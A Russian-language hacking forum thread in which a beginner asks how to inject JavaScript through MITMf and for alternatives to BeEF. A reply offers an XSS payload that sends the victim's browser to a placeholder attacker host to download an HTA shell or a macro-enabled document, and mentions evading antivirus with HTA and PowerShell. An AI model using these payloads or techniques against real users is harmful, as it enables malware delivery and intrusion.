Всем доброго времени суток.

Не так давно начал интересоваться пентестингом (да-да я шарю за модные словечки).

Покурил инфу про MITMF - всё замечательно.

Дошли руки до инжекта JS.

Побаловался с alert('Hola'); - тоже всё замечательно.

Само собой, захотелось инжектить что-то более-менее интересное.

Покурил информацию про Beef - оказался кал в блестящей обертке: хук еще попробуй заинжекти, думает долго, делает долго, работоспособность многих модулей огорчила.

В общем задумка то классная, а вот реализация ожиданий не оправдала.

Итого: интересуют какие-либо аналогичные фреймворки и, впрочем, любая информация / мысли по поводу инжектов через MITMF.

В сети информации минимум, начал читать книги по JS, научился модифицировать страницы посредством JS, но, думаю, потенциал у этой развлекухи бОльший.

Всем спасибо за внимание (многобукафф утомляют, знаю).

Надеюсь что кто-нибудь что-нибудь таки предложит. Тапки не кидать - своих достаточно.

Хочешь самый клевый пэйлоад для ХSS?!

Отвечу сразу: document.location.href = 'http://www.hacker.ru/shell.hta' или document.location.href = 'http://www.hacker.ru/file.docm'

SooLFaa said:
↑ (https://antichat.live/posts/4072439/)
Хочешь самый клевый пэйлоад для ХSS?!
Отвечу сразу: document.location.href = '
http://www.hacker.ru/shell.hta
' или document.location.href = '
http://www.hacker.ru/file.docm
'


И чем это закончится? Скачиванием шелла? А запускать его кто будет?

dom1 said:
↑ (https://antichat.live/posts/4072445/)
И чем это закончится? Скачиванием шелла? А запускать его кто будет?


Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.

SooLFaa said:
↑ (https://antichat.live/posts/4072475/)
Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.


Спасибо. Пошел читать гугол.

SooLFaa said:
↑ (https://antichat.live/posts/4072475/)
Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.


http://clip2net.com/clip/m297191/92e39-clip-8kb.png?nocache=1

При таком раскладе уже лучше beef юзать

dom1 said:
↑ (https://antichat.live/posts/4072925/)
http://clip2net.com/clip/m297191/92e39-clip-8kb.png?nocache=1
При таком раскладе уже лучше beef юзать


Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.

SooLFaa said:
↑ (https://antichat.live/posts/4073049/)
Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.


Я еще в топике написал что я полный ноль. Я сразу сказал что НЕ обладаю знанием дела. Потому и начал спрашивать. Ты в меня кинул 3 буквы hta и я пошел с ними в гугол. Интересно, ты чего ожидал?)